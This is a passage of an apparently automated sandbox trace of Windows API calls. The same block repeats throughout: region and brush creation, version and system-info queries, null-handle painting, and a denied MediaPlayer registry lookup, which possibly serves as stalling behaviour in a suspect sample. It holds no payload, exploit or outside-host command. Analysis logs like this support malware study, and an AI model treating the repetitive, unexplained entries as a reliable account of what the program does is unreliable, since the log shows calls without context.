hrgnSrc2=0x750401d9, iMode=4) returned 2 [0089.265] CreateSolidBrush (color=0xff) returned 0x21055ed [0089.265] CreateSolidBrush (color=0xff0000) returned 0x11055f0 [0089.265] DeleteObject (ho=0x11055f0) returned 1 [0089.265] DeleteObject (ho=0x750401d9) returned 1 [0089.265] DeleteObject (ho=0x730401dc) returned 1 [0089.265] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.265] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.265] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.265] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.265] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.265] BeginPath (hdc=0x0) returned 0 [0089.265] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.265] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.265] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.265] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.265] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.265] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.265] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.265] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.266] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x760401d9 [0089.266] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x740401dc [0089.266] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455f1 [0089.266] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455f2 [0089.266] CombineRgn (hrgnDst=0x10455f1, hrgnSrc1=0x760401d9, hrgnSrc2=0x740401dc, iMode=1) returned 1 [0089.266] CombineRgn (hrgnDst=0x10455f2, hrgnSrc1=0x760401d9, hrgnSrc2=0x740401dc, iMode=4) returned 2 [0089.266] CreateSolidBrush (color=0xff) returned 0x21055f0 [0089.266] CreateSolidBrush (color=0xff0000) returned 0x11055f3 [0089.266] DeleteObject (ho=0x11055f3) returned 1 [0089.266] DeleteObject (ho=0x740401dc) returned 1 [0089.266] DeleteObject (ho=0x760401d9) returned 1 [0089.266] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.266] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.266] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.266] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.266] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.266] BeginPath (hdc=0x0) returned 0 [0089.266] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.266] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.266] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.266] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.266] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.266] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.266] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.266] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.266] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x750401dc [0089.266] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x770401d9 [0089.266] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455f4 [0089.266] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455f5 [0089.266] CombineRgn (hrgnDst=0x10455f4, hrgnSrc1=0x750401dc, hrgnSrc2=0x770401d9, iMode=1) returned 1 [0089.266] CombineRgn (hrgnDst=0x10455f5, hrgnSrc1=0x750401dc, hrgnSrc2=0x770401d9, iMode=4) returned 2 [0089.266] CreateSolidBrush (color=0xff) returned 0x21055f3 [0089.266] CreateSolidBrush (color=0xff0000) returned 0x11055f6 [0089.266] DeleteObject (ho=0x11055f6) returned 1 [0089.266] DeleteObject (ho=0x770401d9) returned 1 [0089.266] DeleteObject (ho=0x750401dc) returned 1 [0089.266] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.266] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.267] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.267] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.267] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.267] BeginPath (hdc=0x0) returned 0 [0089.267] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.267] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.267] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.267] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.267] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.267] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.267] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.267] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.267] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x780401d9 [0089.267] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x760401dc [0089.267] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455f7 [0089.267] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455f8 [0089.267] CombineRgn (hrgnDst=0x10455f7, hrgnSrc1=0x780401d9, hrgnSrc2=0x760401dc, iMode=1) returned 1 [0089.267] CombineRgn (hrgnDst=0x10455f8, hrgnSrc1=0x780401d9, hrgnSrc2=0x760401dc, iMode=4) returned 2 [0089.267] CreateSolidBrush (color=0xff) returned 0x21055f6 [0089.267] CreateSolidBrush (color=0xff0000) returned 0x11055f9 [0089.267] DeleteObject (ho=0x11055f9) returned 1 [0089.267] DeleteObject (ho=0x760401dc) returned 1 [0089.267] DeleteObject (ho=0x780401d9) returned 1 [0089.267] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.267] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.267] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.267] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.267] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.267] BeginPath (hdc=0x0) returned 0 [0089.267] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.267] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.267] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.267] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.267] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.267] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.268] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.268] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.268] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x770401dc [0089.268] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x790401d9 [0089.268] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455fa [0089.268] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455fb [0089.268] CombineRgn (hrgnDst=0x10455fa, hrgnSrc1=0x770401dc, hrgnSrc2=0x790401d9, iMode=1) returned 1 [0089.268] CombineRgn (hrgnDst=0x10455fb, hrgnSrc1=0x770401dc, hrgnSrc2=0x790401d9, iMode=4) returned 2 [0089.268] CreateSolidBrush (color=0xff) returned 0x21055f9 [0089.268] CreateSolidBrush (color=0xff0000) returned 0x11055fc [0089.268] DeleteObject (ho=0x11055fc) returned 1 [0089.268] DeleteObject (ho=0x790401d9) returned 1 [0089.268] DeleteObject (ho=0x770401dc) returned 1 [0089.268] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.268] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.268] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.268] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.268] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.268] BeginPath (hdc=0x0) returned 0 [0089.268] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.268] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.268] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.268] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.268] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.268] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.268] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.268] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.268] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7a0401d9 [0089.268] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x780401dc [0089.268] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455fd [0089.268] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455fe [0089.268] CombineRgn (hrgnDst=0x10455fd, hrgnSrc1=0x7a0401d9, hrgnSrc2=0x780401dc, iMode=1) returned 1 [0089.269] CombineRgn (hrgnDst=0x10455fe, hrgnSrc1=0x7a0401d9, hrgnSrc2=0x780401dc, iMode=4) returned 2 [0089.269] CreateSolidBrush (color=0xff) returned 0x21055fc [0089.269] CreateSolidBrush (color=0xff0000) returned 0x11055ff [0089.269] DeleteObject (ho=0x11055ff) returned 1 [0089.269] DeleteObject (ho=0x780401dc) returned 1 [0089.269] DeleteObject (ho=0x7a0401d9) returned 1 [0089.269] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.269] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.269] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.269] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.269] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.269] BeginPath (hdc=0x0) returned 0 [0089.269] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.269] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.269] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.269] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.269] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.269] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.269] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.269] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.269] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x790401dc [0089.269] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7b0401d9 [0089.269] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045600 [0089.269] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045601 [0089.269] CombineRgn (hrgnDst=0x1045600, hrgnSrc1=0x790401dc, hrgnSrc2=0x7b0401d9, iMode=1) returned 1 [0089.269] CombineRgn (hrgnDst=0x1045601, hrgnSrc1=0x790401dc, hrgnSrc2=0x7b0401d9, iMode=4) returned 2 [0089.269] CreateSolidBrush (color=0xff) returned 0x21055ff [0089.269] CreateSolidBrush (color=0xff0000) returned 0x1105602 [0089.269] DeleteObject (ho=0x1105602) returned 1 [0089.269] DeleteObject (ho=0x7b0401d9) returned 1 [0089.269] DeleteObject (ho=0x790401dc) returned 1 [0089.269] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.269] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.269] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.270] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.270] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.270] BeginPath (hdc=0x0) returned 0 [0089.270] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.270] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.270] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.270] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.270] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.270] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.270] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.270] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.270] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7c0401d9 [0089.270] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7a0401dc [0089.270] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045603 [0089.270] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045604 [0089.270] CombineRgn (hrgnDst=0x1045603, hrgnSrc1=0x7c0401d9, hrgnSrc2=0x7a0401dc, iMode=1) returned 1 [0089.270] CombineRgn (hrgnDst=0x1045604, hrgnSrc1=0x7c0401d9, hrgnSrc2=0x7a0401dc, iMode=4) returned 2 [0089.270] CreateSolidBrush (color=0xff) returned 0x2105602 [0089.270] CreateSolidBrush (color=0xff0000) returned 0x1105605 [0089.270] DeleteObject (ho=0x1105605) returned 1 [0089.270] DeleteObject (ho=0x7a0401dc) returned 1 [0089.270] DeleteObject (ho=0x7c0401d9) returned 1 [0089.270] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.270] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.270] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.270] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.270] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.270] BeginPath (hdc=0x0) returned 0 [0089.270] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.270] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.270] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.270] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.270] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.270] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.270] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.270] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.271] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7b0401dc [0089.271] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7d0401d9 [0089.271] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045606 [0089.271] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045607 [0089.271] CombineRgn (hrgnDst=0x1045606, hrgnSrc1=0x7b0401dc, hrgnSrc2=0x7d0401d9, iMode=1) returned 1 [0089.271] CombineRgn (hrgnDst=0x1045607, hrgnSrc1=0x7b0401dc, hrgnSrc2=0x7d0401d9, iMode=4) returned 2 [0089.271] CreateSolidBrush (color=0xff) returned 0x2105605 [0089.271] CreateSolidBrush (color=0xff0000) returned 0x1105608 [0089.271] DeleteObject (ho=0x1105608) returned 1 [0089.271] DeleteObject (ho=0x7d0401d9) returned 1 [0089.271] DeleteObject (ho=0x7b0401dc) returned 1 [0089.271] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.271] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.271] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.271] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.271] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.271] BeginPath (hdc=0x0) returned 0 [0089.271] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.271] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.271] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.271] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.271] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.271] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.271] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.271] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.271] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7e0401d9 [0089.271] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c0401dc [0089.271] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045609 [0089.271] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104560a [0089.271] CombineRgn (hrgnDst=0x1045609, hrgnSrc1=0x7e0401d9, hrgnSrc2=0x7c0401dc, iMode=1) returned 1 [0089.271] CombineRgn (hrgnDst=0x104560a, hrgnSrc1=0x7e0401d9, hrgnSrc2=0x7c0401dc, iMode=4) returned 2 [0089.271] CreateSolidBrush (color=0xff) returned 0x2105608 [0089.271] CreateSolidBrush (color=0xff0000) returned 0x110560b [0089.271] DeleteObject (ho=0x110560b) returned 1 [0089.272] DeleteObject (ho=0x7c0401dc) returned 1 [0089.272] DeleteObject (ho=0x7e0401d9) returned 1 [0089.272] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.272] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, 